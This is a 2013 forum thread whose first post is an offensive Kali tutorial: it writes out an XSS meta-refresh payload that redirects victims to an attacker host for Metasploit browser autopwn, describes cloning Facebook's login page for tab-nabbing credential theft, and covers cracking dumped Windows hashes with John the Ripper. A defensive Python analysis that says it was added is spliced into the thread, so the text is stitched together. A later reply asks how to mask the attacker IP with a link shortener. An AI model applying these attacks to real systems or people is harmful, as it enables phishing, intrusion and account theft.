
TUTORIAL - Exploitation

Discussion in 'Exploitation' started by Witranx, Apr 1, 2013.

  1. Witranx

    Witranx Staff Member

    Joined:
    Mar 25, 2013
    Messages:
    27
    Likes Received:
    21
    Introduction

    In this Kali tutorial, we will use Kali tools to exploit a remote system and learn how the exploitation framework can be used with the privilege escalation tool John the Ripper to crack passwords and gain access to a remote Windows system.

    Metasploit Armitage

    Metasploit Armitage is the GUI version of the famous Metasploit framework. In this part, we will look at the browser autopwn exploit for Windows XP using Metasploit Armitage.

    Features of this attack:
    1. Use of the auxiliary module of Metasploit Armitage.
    2. Around 22 exploit modules used to carry out the attack
    3. Use of the social engineering approach
    4. Auto-migration to notepad.exe from the browser process

    For this exploit, you need a site with a cross-site scripting (XSS) URL redirection vulnerability. The victim clicks on a particular URL in the browser, which spawns a meterpreter shell in the victim's system. The URL redirection code will look something like:

    Code:
    http://vulnerablesite?c="><meta HTTP-EQUIV="REFRESH" content="0; url=http://attackerIPaddress ">

    The auto-migration feature is used to spawn the exploit into a new process, because if the exploit is not migrated, the whole attack will terminate when the user closes the browser. Migration is therefore done automatically to maintain prolonged access.

    Social-Engineer Toolkit

    In this Kali guide, I will discuss a type of attack called tab nabbing. In this attack, the victim opens a link in a browser, but as soon as he changes to another tab, the original page is replaced with a fake page, which allows attacker(s) to gain the victim's login credentials. The victim is duped into entering his username and password on a fake site.

    In this "social engineering" attack, we choose a website attack vector and the option to clone the website. We specify the site to clone, whose login credentials we desire to obtain. I have cloned Facebook in this Kali guide for demonstration purposes only*. Please note that cloning will not occur if you are not connected to the Internet during the process.


    A fake Facebook login page created by the Social Engineer Toolkit based on options set by the attacker.
    POST data captured by the Social Engineer Toolkit framework from a fake Facebook login page.

    Privilege Escalation tools

    We may not always gain administrator or superuser access to a remote system. As an attacker, we need maximum privileges on the target to execute our payloads and perform desired actions. Kali offers a wide range of privilege escalation tools to meet these needs, as shown in Figure 5 of this Kali guide.

    John the Ripper

    Once the victim has been compromised (please refer to the above articles on SET and MSF for more details), the password cracker John the Ripper can be used to crack the Windows hashes to escalate privileges and gain administrator rights to the system.
    After exploitation, the hashes are dumped to a text file, and this text file is supplied to John the Ripper. John the Ripper is a very effective tool for cracking password hashes of remote systems once the hashes are available. The attack demonstrated in this Kali guide can be carried out with either the Metasploit Framework or the Social Engineer Toolkit.

    With these passwords in hand, we can now escalate our privileges on the target system.

    It is evident from this guide that a crafty attacker with Kali can make maximum use of these tools and combine them to maximize his benefit. This Kali guide highlights the most important exploitation and privilege escalation tools. In the Kali guides to come, I will cover some more exploitation and privilege escalation techniques.



     
    #1
    wlan0 and DarkSolo like this.
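The redirection URL quoted in the post above only works because the site reflects the `c` parameter into its HTML without escaping it. The following is an added example, not code from the original post or from Armitage: a hypothetical page (`render_vulnerable`) that echoes the parameter into an attribute the way the vulnerable site must, the same page with the parameter HTML-escaped (`render_fixed`), and a small check that tells you whether the rendered page now carries the injected meta refresh and where it would send the browser. The attacker URL is the one from the post; the page markup and function names are assumptions made for the example.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Attacker URL in the shape quoted in the post (hostnames are placeholders from the post).
ATTACK_URL = ('http://vulnerablesite?c="><meta HTTP-EQUIV="REFRESH" '
              'content="0; url=http://attackerIPaddress ">')

# Matches a meta refresh and captures the URL it redirects to.
_META_REFRESH = re.compile(
    r'<meta\s+http-equiv\s*=\s*"?refresh"?\s+content\s*=\s*"\s*\d+\s*;\s*url=([^"\s]+)',
    re.IGNORECASE,
)


def param_c(url: str) -> str:
    """Extract the raw c parameter exactly as the server would see it."""
    return parse_qs(urlsplit(url).query)["c"][0]


def render_vulnerable(c: str) -> str:
    """Hypothetical vulnerable page: the parameter is reflected verbatim into an attribute.

    The leading '">' in the payload closes the attribute and the <input> tag, so the
    attacker-supplied <meta> lands in the page as real markup.
    """
    return f'<html><body><input name="c" value="{c}"></body></html>'


def render_fixed(c: str) -> str:
    """Same page with HTML escaping applied before the value enters the attribute.

    html.escape with quote=True turns < > & " ' into entities, so the payload can no
    longer break out of the quoted attribute.
    """
    return f'<html><body><input name="c" value="{html.escape(c, quote=True)}"></body></html>'


def injected_redirect(page: str):
    """Return the target of a meta refresh found in the page, or None if there is none."""
    m = _META_REFRESH.search(page)
    return m.group(1) if m else None


if __name__ == "__main__":
    c = param_c(ATTACK_URL)
    print("vulnerable page redirects to:", injected_redirect(render_vulnerable(c)))
    print("fixed page redirects to:     ", injected_redirect(render_fixed(c)))
```

The `content="0; ..."` part is what makes the redirect immediate: the victim's browser fetches the attacker's host as soon as the reflected page loads, which is how the click on a link to the trusted site ends up at the browser autopwn listener. Output encoding at the point of reflection, as in `render_fixed`, is the fix on the site side.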
  2. DarkSolo

    DarkSolo Staff Member

    Joined:
    Mar 14, 2013
    Messages:
    199
    Likes Received:
    49
    Good job!
     
    #2
    Witranx likes this.
  3. Witranx

    Witranx Staff Member

    Joined:
    Mar 25, 2013
    Messages:
    27
    Likes Received:
    21
    #3
  4. danlix

    danlix New Member

    Joined:
    Apr 14, 2013
    Messages:
    4
    Likes Received:
    0
  5. Lotfi

    Lotfi New Member

    Joined:
    Apr 24, 2013
    Messages:
    8
    Likes Received:
    0
    many thanks
     
    #5
  6. WarLock

    WarLock New Member

    Joined:
    Apr 27, 2013
    Messages:
    1
    Likes Received:
    0
    Are the exploit steps the same in BackTrack and Kali?
     
    #6
  7. José Brito

    José Brito New Member

    Joined:
    Apr 29, 2013
    Messages:
    3
    Likes Received:
    0
    Thanks a lot for this tutorial ;)
     
    #7
  8. St3altH

    St3altH New Member

    Joined:
    May 11, 2013
    Messages:
    3
    Likes Received:
    1
    Sorry... nice summary, but where is the tutorial?
    Tx
     
    #8
    leon kilat likes this.
  9. IT-HACKERs

    IT-HACKERs New Member

    Joined:
    May 12, 2013
    Messages:
    1
    Likes Received:
    0
    Thank you very much... sir...
     
    #9
  10. hDNA

    hDNA New Member

    Joined:
    May 22, 2013
    Messages:
    4
    Likes Received:
    0
    GOOD JOB
     
    #10
  11. dragon

    dragon New Member

    Joined:
    May 31, 2013
    Messages:
    11
    Likes Received:
    1
    Thanks for sharing this tutorial, bro :)
     
    #11
  12. fareezizwar

    fareezizwar New Member

    Joined:
    Apr 16, 2013
    Messages:
    10
    Likes Received:
    1
    Thanks for sharing ;)
     
    #12
  13. Crius

    Crius New Member

    Joined:
    Aug 17, 2013
    Messages:
    7
    Likes Received:
    0
    thanks for the share! very informative! ...
     
    #13
  14. leon kilat

    leon kilat New Member

    Joined:
    Sep 20, 2013
    Messages:
    4
    Likes Received:
    0
    yeah, where is the tutorial?
     
    #14
  15. #KILLC0D3

    #KILLC0D3 New Member

    Joined:
    Feb 6, 2014
    Messages:
    8
    Likes Received:
    0
    Nice one, bro :) Thanks
     
    #15
  16. rEvolt!

    rEvolt! New Member

    Joined:
    Mar 12, 2014
    Messages:
    12
    Likes Received:
    0
    Nice sharing, bro :D But I want to know how to change our IP to a DNS name.
    Can I use something like tinyurl.com?
     
    #16
  17. NY-Freaks

    NY-Freaks New Member

    Joined:
    May 30, 2014
    Messages:
    3
    Likes Received:
    1
    cool...
     
    #17
